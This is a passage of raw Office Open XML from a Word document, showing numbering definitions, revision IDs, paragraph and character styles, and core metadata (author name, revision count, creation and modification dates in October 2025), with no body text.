  </w:num>
  <w:num w:numId="8" w16cid:durableId="1705716607">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="386563993">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="259067196">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1724987275">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="862590807">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1128282482">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="469260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349"/>
    <w:rsid w:val="00030DE4"/>
    <w:rsid w:val="000407F5"/>
    <w:rsid w:val="00073721"/>
    <w:rsid w:val="00077889"/>
    <w:rsid w:val="00094512"/>
    <w:rsid w:val="000B2842"/>
    <w:rsid w:val="000C797D"/>
    <w:rsid w:val="001116E4"/>
    <w:rsid w:val="00121DD1"/>
    <w:rsid w:val="00133834"/>
    <w:rsid w:val="00144072"/>
    <w:rsid w:val="00147C6C"/>
    <w:rsid w:val="00194A31"/>
    <w:rsid w:val="001E42A2"/>
    <w:rsid w:val="001F1E92"/>
    <w:rsid w:val="002049EC"/>
    <w:rsid w:val="00215FE1"/>
    <w:rsid w:val="00244F08"/>
    <w:rsid w:val="0027624A"/>
    <w:rsid w:val="002A336B"/>
    <w:rsid w:val="002A7908"/>
    <w:rsid w:val="002B1318"/>
    <w:rsid w:val="002D5349"/>
    <w:rsid w:val="002D6E00"/>
    <w:rsid w:val="002E64AF"/>
    <w:rsid w:val="002F6FAE"/>
    <w:rsid w:val="00302BA3"/>
    <w:rsid w:val="00360620"/>
    <w:rsid w:val="003642B6"/>
    <w:rsid w:val="003770B3"/>
    <w:rsid w:val="00384FBD"/>
    <w:rsid w:val="00394906"/>
    <w:rsid w:val="003C2D25"/>
    <w:rsid w:val="004271D2"/>
    <w:rsid w:val="00463D0D"/>
    <w:rsid w:val="004768E7"/>
    <w:rsid w:val="00477A52"/>
    <w:rsid w:val="004C4264"/>
    <w:rsid w:val="004C6B6A"/>
    <w:rsid w:val="004D17F5"/>
    <w:rsid w:val="00514273"/>
    <w:rsid w:val="005177AE"/>
    <w:rsid w:val="0052756C"/>
    <w:rsid w:val="0053168A"/>
    <w:rsid w:val="005660D7"/>
    <w:rsid w:val="005A1974"/>
    <w:rsid w:val="005A2D5E"/>
    <w:rsid w:val="005A67B5"/>
    <w:rsid w:val="005C4DB9"/>
    <w:rsid w:val="005D2321"/>
    <w:rsid w:val="005D6D47"/>
    <w:rsid w:val="005D75A4"/>
    <w:rsid w:val="005F51C8"/>
    <w:rsid w:val="0060591C"/>
    <w:rsid w:val="00617067"/>
    <w:rsid w:val="006375A0"/>
    <w:rsid w:val="00642C54"/>
    <w:rsid w:val="006775EA"/>
    <w:rsid w:val="006B56B0"/>
    <w:rsid w:val="006D0D7C"/>
    <w:rsid w:val="006D1700"/>
    <w:rsid w:val="006E569F"/>
    <w:rsid w:val="00706EB4"/>
    <w:rsid w:val="0071036D"/>
    <w:rsid w:val="00715B66"/>
    <w:rsid w:val="007201E7"/>
    <w:rsid w:val="00721A3D"/>
    <w:rsid w:val="00753105"/>
    <w:rsid w:val="00773F58"/>
    <w:rsid w:val="007775EC"/>
    <w:rsid w:val="00793D34"/>
    <w:rsid w:val="007F25B7"/>
    <w:rsid w:val="007F7684"/>
    <w:rsid w:val="00823A36"/>
    <w:rsid w:val="0083375B"/>
    <w:rsid w:val="00890B6C"/>
    <w:rsid w:val="00894FFB"/>
    <w:rsid w:val="008976D8"/>
    <w:rsid w:val="008C466F"/>
    <w:rsid w:val="008D54D5"/>
    <w:rsid w:val="00921B32"/>
    <w:rsid w:val="00930FC5"/>
    <w:rsid w:val="00943882"/>
    <w:rsid w:val="00945D1C"/>
    <w:rsid w:val="00973192"/>
    <w:rsid w:val="00981D7C"/>
    <w:rsid w:val="009E2E3A"/>
    <w:rsid w:val="009E7D43"/>
    <w:rsid w:val="00A048AC"/>
    <w:rsid w:val="00A102CB"/>
    <w:rsid w:val="00A42A3B"/>
    <w:rsid w:val="00A74304"/>
    <w:rsid w:val="00A761D4"/>
    <w:rsid w:val="00A86239"/>
    <w:rsid w:val="00AB3DF6"/>
    <w:rsid w:val="00AB7DD6"/>
    <w:rsid w:val="00AD4639"/>
    <w:rsid w:val="00B20EAB"/>
    <w:rsid w:val="00B24A1C"/>
    <w:rsid w:val="00B44000"/>
    <w:rsid w:val="00B524AB"/>
    <w:rsid w:val="00BB4BF7"/>
    <w:rsid w:val="00BB4E89"/>
    <w:rsid w:val="00BC692A"/>
    <w:rsid w:val="00C00CA5"/>
    <w:rsid w:val="00C1464B"/>
    <w:rsid w:val="00C2752E"/>
    <w:rsid w:val="00C27AC6"/>
    <w:rsid w:val="00C30B04"/>
    <w:rsid w:val="00C6496D"/>
    <w:rsid w:val="00C8232D"/>
    <w:rsid w:val="00CB33B5"/>
    <w:rsid w:val="00CB34D4"/>
    <w:rsid w:val="00CE78D1"/>
    <w:rsid w:val="00CF7EFC"/>
    <w:rsid w:val="00D2521B"/>
    <w:rsid w:val="00D428DA"/>
    <w:rsid w:val="00D705A8"/>
    <w:rsid w:val="00DB14C3"/>
    <w:rsid w:val="00DD6B2E"/>
    <w:rsid w:val="00DE36F1"/>
    <w:rsid w:val="00E111BD"/>
    <w:rsid w:val="00E1572B"/>
    <w:rsid w:val="00E17ED8"/>
    <w:rsid w:val="00E21924"/>
    <w:rsid w:val="00E465BC"/>
    <w:rsid w:val="00E67D58"/>
    <w:rsid w:val="00E902E5"/>
    <w:rsid w:val="00EC414F"/>
    <w:rsid w:val="00ED17BF"/>
    <w:rsid w:val="00ED5855"/>
    <w:rsid w:val="00EE739C"/>
    <w:rsid w:val="00F25BB3"/>
    <w:rsid w:val="00F52814"/>
    <w:rsid w:val="00F603CF"/>
    <w:rsid w:val="00F90DE5"/>
    <w:rsid w:val="00FB2456"/>
    <w:rsid w:val="00FE63DB"/>
    <w:rsid w:val="00FE750B"/>
    <w:rsid w:val="00FE7C06"/>
    <w:rsid w:val="00FF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7C03A"/>
  <w15:docId w15:val="{2A9A0ABF-F92C-488C-8CCD-2C38298AC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Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00890B6C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paragraph" w:styleId="a6">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="000407F5"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000407F5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407F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407F5"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00CE78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2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6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7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96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7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1594</Words>
  <Characters>909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Keyd8n Deffer</dc:creator>
  <cp:lastModifiedBy>Keyd8n Deffer</cp:lastModifiedBy>
  <cp:revision>86</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-09T20:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-15T18:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>